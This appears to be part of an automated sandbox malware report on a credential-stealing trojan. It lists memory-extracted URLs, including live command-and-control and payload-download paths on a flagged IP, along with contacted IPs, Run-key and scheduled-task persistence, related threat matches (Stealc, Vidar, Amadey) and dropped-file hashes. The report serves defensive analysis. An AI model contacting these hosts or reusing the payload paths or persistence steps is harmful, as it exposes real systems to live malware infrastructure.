http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13Response	buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B	file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://screenshots.firefox.comPage	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://monitor.firefox.com/user/preferences	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://screenshots.firefox.com/	firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id4ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dllk	file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://85.28.47.31/5499d72b3a3e55be.phposition:	file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.153.155.231	ssl.bingadsedgeextension-prod-centralus.azurewebsites.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.251.35.161	unknown	United States	15169	GOOGLEUS	false
142.250.65.163	unknown	United States	15169	GOOGLEUS	false
85.28.47.31	unknown	Russian Federation	31643	GES-ASRU	true
142.251.40.227	unknown	United States	15169	GOOGLEUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
172.217.23.110	unknown	United States	15169	GOOGLEUS	false
142.251.168.84	unknown	United States	15169	GOOGLEUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.67	unknown	United States	15169	GOOGLEUS	false
185.215.113.9	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.185.110	unknown	United States	15169	GOOGLEUS	false
64.233.167.84	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
20.75.60.91	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
104.21.72.79	vaniloin.fun	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483138
Start date and time:	2024-07-26 17:55:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 19m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@100/171@31/20
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 55% Number of executed functions: 84 Number of non-executed functions: 196
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 142.250.186.35, 172.217.16.142, 52.168.117.173, 34.104.35.123, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.19.126.152, 2.19.126.145, 2.23.209.182, 2.23.209.189, 2.23.209.149, 2.23.209.130, 2.23.209.133, 2.23.209.140, 2.23.209.176, 2.23.209.179, 2.23.209.185, 20.42.65.92, 216.58.206.67, 142.250.185.206, 142.250.186.174, 20.223.36.55, 216.58.206.42, 172.217.23.106, 142.250.185.170, 172.217.18.106, 142.250.186.42, 142.250.185.234, 142.250.186.138, 142.250.185.202, 142.250.181.234, 142.250.185.106, 216.58.212.170, 142.250.186.74, 216.58.206.74, 142.250.185.74, 172.217.16.138, 142.250.184.234, 142.250.185.142, 142.250.185.138, 142.250.176.195, 142.250.65.195, 142.251.40.163, 172.217.165.131, 142.250.80.3, 142.250.80.35
Excluded domains from analysis (whitelisted): prod.pocket.prod.cloudops.mozgcp.net, youtube.googleapis.com, tiles-cdn.prod.ads.prod.webservices.mozgcp.net, www.businessinsider.com, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, ipv4only.arpa, config-edge-skype.l-0007.l-msedge.net, firefox.settings.services.mozilla.com, www.google.com, www.youtube.com, r3.o.lencr.org, normandy-cdn.services.mozilla.com, www.bing.com, google.com, shavar.prod.mozaws.net, restrict.youtube.com, bingadsedgeextension-prod.trafficmanager.net, detectportal.firefox.com, dyna.wikimedia.org, pki-goog.l.google.com, normandy.cdn.mozilla.net, youtube-ui.l.google.com, onedsblobprdeus17.eastus.cloudapp.azure.com, reddit.map.fastly.net, edgedl.me.gvt1.com, classify-client.services.mozilla.com, m.youtube.com, clients.l.google.com, www.buy.cloaked.com, example.org, prod.detectportal.prod.cloudops.mozgcp.net, www.reddit.com, partners.thepennyhoarder.com, BOAbiVqkIfMQExjauBCL
Execution Graph export aborted for target RoamingAEGIJKEHCA.exe, PID 2604 because it is empty
Execution Graph export aborted for target RoamingBKKFHIEGDH.exe, PID 7080 because it is empty
Execution Graph export aborted for target axplong.exe, PID 2820 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6204 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:56:41	API Interceptor	2x Sleep call for process: WerFault.exe modified
11:57:01	API Interceptor	9331081x Sleep call for process: axplong.exe modified
11:57:02	API Interceptor	9321242x Sleep call for process: explorti.exe modified
11:57:07	API Interceptor	1x Sleep call for process: PharmaciesDetection.exe modified
11:57:19	API Interceptor	8x Sleep call for process: ba77748b9b.exe modified
11:57:24	API Interceptor	56x Sleep call for process: buildred.exe modified
11:57:28	API Interceptor	7x Sleep call for process: build2.exe modified
17:56:23	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
17:56:30	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
17:57:07	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe
17:57:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe C:\Users\user\1000003002\ead6a72944.exe
17:57:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ba77748b9b.exe C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe
17:57:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ead6a72944.exe C:\Users\user\1000003002\ead6a72944.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.153.155.231	file.exe	Get hash	malicious	Babadeda	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.14108.29028.exe	Get hash	malicious	RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.17964.23581.exe	Get hash	malicious	RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.17533.12813.exe	Get hash	malicious	RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.1550.22003.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.30216.13774.exe	Get hash	malicious	RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.2497.16579.exe	Get hash	malicious	RisePro Stealer	Browse
	PDFSuperHero.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.27020.26387.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.22795.17363.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse
85.28.47.31	joom.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	CqFFuklrhj.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	Jzu7V2qdJx.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31/5499d72b3a3e55be.php
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31/5499d72b3a3e55be.php
152.195.19.97	http://ustteam.com/	Get hash	malicious	Unknown	Browse	www.ust.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
googlehosted.l.googleusercontent.com	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	142.250.181.225
	file.exe	Get hash	malicious	Babadeda	Browse	142.250.184.225
	http://desistarsgilrsfunclub.blogspot.com	Get hash	malicious	Unknown	Browse	172.217.18.97
	file.exe	Get hash	malicious	Babadeda	Browse	142.250.184.193
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	142.250.185.129
	file.exe	Get hash	malicious	Babadeda	Browse	142.250.186.33
	file.exe	Get hash	malicious	Babadeda	Browse	142.250.186.161
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	142.250.184.193
	http://baghoorg.xyz	Get hash	malicious	Unknown	Browse	172.217.23.97
	6Vm1Ii4ASz.exe	Get hash	malicious	Babadeda	Browse	142.250.186.33
vaniloin.fun	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	N4HEBe8AaW.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	N4HEBe8AaW.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	tOPsLIbzyD.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://disney.apexanalytix.com/Help/DownloadFile?ID=P%2fgMga3n7lQ%3d	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	file.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	172.64.41.3
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-centralus.azurewebsites.net	file.exe	Get hash	malicious	Babadeda	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.14108.29028.exe	Get hash	malicious	RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.17964.23581.exe	Get hash	malicious	RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.17533.12813.exe	Get hash	malicious	RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.1550.22003.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.30216.13774.exe	Get hash	malicious	RisePro Stealer	Browse	52.153.155.231
	PDFSuperHero.exe	Get hash	malicious	Unknown	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.27020.26387.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.22795.17363.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse	52.153.155.231
	SecuriteInfo.com.Win32.TrojanX-gen.14293.13935.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer	Browse	52.153.155.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	172.64.41.3
	https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0	Get hash	malicious	Phisher	Browse	104.21.52.77
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	104.21.10.30
	https://forms.office.com/e/4PVhav2XCG	Get hash	malicious	Unknown	Browse	104.16.117.116
	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	1.8.62.115
	https://pe-encrypt.statefarm.com/formpostdir/securereader?id=Lpcn7iyYhE0u8Rg0xxSBcOU-9IPSMsmm&brand=3993e80ababa08f55	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://arborstaff.freshdesk.com/en/support/solutions/articles/153000192392-new-docucment-shared-with-you	Get hash	malicious	HTMLPhisher	Browse	104.17.171.120
	reference usfinancegl@ey.com - Search.pdf	Get hash	malicious	Unknown	Browse	104.18.36.155
	Monetary_Funding_Sheet_2024.js	Get hash	malicious	WSHRAT	Browse	188.114.97.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	20.75.60.91
	https://alamanaschool-my.sharepoint.com/:o:/g/personal/faridhajahan_kg_amanaschool_com/EjJ3Pc0GI4lCgL5xS_fmQD0Bn9XR0VtN5_yNafsBQyYJsg?e=OHPWmQ	Get hash	malicious	Unknown	Browse	52.108.9.12
	file.exe	Get hash	malicious	Babadeda	Browse	23.96.180.189
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	52.109.76.240
	AKPSrAWl2G.elf	Get hash	malicious	Mirai	Browse	40.70.116.231
	TRn7934M3A.elf	Get hash	malicious	Mirai	Browse	52.165.41.83
	rLog7rmU2e.elf	Get hash	malicious	Mirai	Browse	13.88.34.84
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	20.91.156.206
	5oXS6HtbzC.elf	Get hash	malicious	Mirai	Browse	13.75.242.142
	https://arborstaff.freshdesk.com/en/support/solutions/articles/153000192392-new-docucment-shared-with-you	Get hash	malicious	HTMLPhisher	Browse	20.75.114.39
EDGECASTUS	file.exe	Get hash	malicious	Babadeda, Coinhive, Xmrig	Browse	152.195.19.97
	file.exe	Get hash	malicious	Babadeda	Browse	152.195.19.97
	FW_ Data Sync Completed Successfully - #BWYEIQF_.eml	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://arborstaff.freshdesk.com/en/support/solutions/articles/153000192392-new-docucment-shared-with-you	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://www.congresosucv.com/maindeal/fxc/bWVsaXNzYS53aGl0ZWh1cnN0QGFmZm9yZGFibGVkZW50dXJlcy5jb20=	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://fiffr-12d16.web.app	Get hash	malicious	Unknown	Browse	93.184.215.14
	One_Docx 1.pdf	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	file.exe	Get hash	malicious	Babadeda	Browse	152.195.19.97
	https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=	Get hash	malicious	Phisher	Browse	152.199.21.175
GES-ASRU	joom.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	CqFFuklrhj.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31
	Jzu7V2qdJx.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	pn24_065.docx.doc	Get hash	malicious	Unknown	Browse	104.21.72.79
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	104.21.72.79
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	104.21.72.79
	DS_Store.exe	Get hash	malicious	CobaltStrike, ReflectiveLoader	Browse	104.21.72.79
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	104.21.72.79
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.21.72.79
	TBw6qwEBHZ.exe	Get hash	malicious	BlackMoon, Neshta, XRed	Browse	104.21.72.79

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAEBGCFIEHCFIDGCAAFBFCGCAA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGCAAFHIEBKJKEBFIEHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
